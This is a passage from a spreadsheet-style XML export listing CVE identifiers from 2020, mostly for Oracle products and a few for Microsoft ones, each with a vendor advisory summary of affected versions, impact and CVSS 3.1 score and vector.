    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1476</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files, aka 'ASP.NET and .NET Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14760</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.3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5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14761</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: Oracle Diagnostics Interfaces). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data as well as unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14762</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Application Express component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having SQL Workshop privilege with network access via HTTP to compromise Oracle Application Express. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express accessible data as well as unauthorized read access to a subset of Oracle Application Express accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14763</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Application Express Quick Poll component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Quick Poll. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Quick Poll, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Quick Poll accessible data as well as unauthorized read access to a subset of Oracle Application Express Quick Poll accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14764</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion Planning product of Oracle Hyperion (component: Application Development Framework). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Planning. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Planning accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14765</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21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0-14766</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web Administration). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14767</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Hyperion BI+ accessible data. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14768</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion Analytic Provider Services product of Oracle Hyperion (component: Smart View Provider). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the Hyperion Analytic Provider Services executes to compromise Hyperion Analytic Provider Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion Analytic Provider Services accessible data as well as unauthorized read access to a subset of Hyperion Analytic Provider Services accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Hyperion Analytic Provider Services. CVSS 3.1 Base Score 4.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-14769</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21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0-1477</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1379, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554.</t>
  </si>
  <si>
    <t>CVE-2020-14770</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Hyperion BI+ accessible data. CVSS 3.1 Base Score 2.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14771</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14772</t>
  </si>
  <si>
    <t>CVE-2020-14773</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are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774</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.1 - 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle CRM Technical Foundation. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14775</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and 8.0.21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0-14776</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and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777</t>
  </si>
  <si>
    <t>CVE-2020-14778</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise HCM Global Payroll Core product of Oracle PeopleSoft (component: Security). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise HCM Global Payroll Core. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HCM Global Payroll Core accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HCM Global Payroll Core accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise HCM Global Payroll Core. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14779</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit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1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-1478</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1379, CVE-2020-1477, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554.</t>
  </si>
  <si>
    <t>CVE-2020-14780</t>
  </si>
  <si>
    <t>Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14781</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded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1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14782</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded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1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14783</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality RES 3700 product of Oracle Food and Beverage Applications (component: CAL). The supported version that is affected is 5.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Hospitality RES 3700. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Hospitality RES 3700 accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14784</t>
  </si>
  <si>
    <t>CVE-2020-14785</t>
  </si>
  <si>
    <t>CVE-2020-14786</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are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787</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14788</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14789</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.7.31 and prior and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79</t>
  </si>
  <si>
    <t>CVE-2020-14790</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.31 and prior and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791</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14792</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit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update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded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1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14793</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and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794</t>
  </si>
  <si>
    <t>CVE-2020-14795</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14796</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit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read access to a subset of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1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14797</t>
  </si>
  <si>
    <t>CVE-2020-14798</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit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update, insert or delete access to some of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1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14799</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.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80</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, aka 'Windows GDI Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1529.</t>
  </si>
  <si>
    <t>CVE-2020-14800</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.21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0-14801</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.56, 8.57 and 8.58.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0-14802</t>
  </si>
  <si>
    <t>CVE-2020-14803</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE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1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14804</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are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805</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle E-Business Suite Secure Enterprise Search product of Oracle E-Business Suite (component: Search Integration Engine). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite Secure Enterprise Search. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle E-Business Suite Secure Enterprise Search accessible data as well as unauthorized access to critical data or complete access to all Oracle E-Business Suite Secure Enterprise Search accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14806</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14807</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Suite8 accessible data as well as unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14808</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14809</t>
  </si>
  <si>
    <t>CVE-2020-1481</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the ESLint extension for Visual Studio Code when it validates source code after opening a project, aka 'Visual Studio Code ESLint Extention Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14810</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data as well as unauthorized read access to a subset of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14811</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: AMP EBS Integration). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14812</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and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813</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Grids). Supported versions that are affected are 8.56, 8.57 and 8.58.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0-14814</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are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815</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable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access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14816</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 - 12.1.3 and 12.2.3 - 12.2.10.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access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14817</t>
  </si>
  <si>
    <t>CVE-2020-14818</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Utility). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with network access via SSH to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.0 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14819</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). The supported version that is affected is 12.1.3.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access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1482</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1198, CVE-2020-1227, CVE-2020-1345, CVE-2020-1514, CVE-2020-1575.</t>
  </si>
  <si>
    <t>CVE-2020-14820</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14821</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are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822</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: APIs). Supported versions that are affected are 12.1.1 - 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14823</t>
  </si>
  <si>
